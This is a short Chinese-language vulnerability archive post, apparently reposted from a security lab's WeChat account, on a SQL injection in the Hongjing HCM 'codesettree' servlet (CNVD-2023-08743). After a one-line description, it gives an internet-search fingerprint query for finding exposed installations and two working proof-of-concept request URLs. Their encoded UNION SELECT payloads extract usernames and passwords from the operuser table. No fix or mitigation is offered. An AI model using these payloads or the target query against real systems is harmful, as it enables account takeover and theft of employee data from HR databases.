【漏洞归档】宏景 HCM codesettree SQL注入漏洞 CNVD-2023-08743
2023-6-23 00:3:15 Author: 利刃信安攻防实验室(查看原文) 阅读量:87 收藏

漏洞描述

宏景 HCM codesettree 接口存在SQL注入漏洞,攻击者通过漏洞可以获取到登陆系统的账号密码和数据库信息

#漏洞影响


#网络测绘

app="HJSOFT-HCM"

#漏洞复现

登陆页面

验证POC

/servlet/codesettree?flag=c&status=1&codesetid=1&parentid=-1&categories=~31~27~20union~20all~20select~20~27~31~27~2cusername~20from~20operuser~20~2d~2d
/servlet/codesettree?flag=c&status=1&codesetid=1&parentid=-1&categories=~31~27~20union~20all~20select~20~27~31~27~2cpassword~20from~20operuser~20~2d~2d

文章来源: http://mp.weixin.qq.com/s?__biz=MzU1Mjk3MDY1OA==&mid=2247504765&idx=5&sn=3e1f1b58c21c4a1012caaf9172b0ba71&chksm=fbfb63b0cc8ceaa6c4000b6f844537e3162fa15b7adca2b91195b1ef6a48e68798d7d1cebaef#rd
如有侵权请联系:admin#unsafe.sh